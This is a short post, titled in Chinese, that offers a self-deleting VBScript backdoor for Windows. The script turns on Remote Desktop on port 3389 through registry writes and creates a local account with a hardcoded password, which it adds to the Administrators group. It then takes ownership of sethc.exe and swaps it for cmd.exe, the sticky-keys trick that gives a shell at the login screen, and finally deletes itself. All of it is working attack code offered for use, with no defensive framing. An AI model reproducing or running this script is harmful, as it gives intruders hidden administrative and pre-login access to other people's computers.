可自删除 开启3389创建用户粘滞键后门的vbs

1. on error resume next  
2. const HKEY_LOCAL_MACHINE = &H80000002  
3. strComputer = "."  
4. Set StdOut = WScript.StdOut  
5. Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_  
6. strComputer & "\root\default:StdRegProv")  
7. strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"  
8. oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
9. strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"  
10. oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
11. strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  
12. strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"  
13. strValueName = "fDenyTSConnections"  
14. dwValue = 0  
15. oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  
16. strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"  
17. strValueName = "PortNumber"  
18. dwValue = 3389  
19. oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  
20. strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  
21. strValueName = "PortNumber"  
22. dwValue = 3389  
23. oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  
24. on error resume next  
25. dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath  
26. On Error Resume Next  
27. Dim obj, success  
28. Set obj = CreateObject("WScript.Shell")  
29. success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)  
30. CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)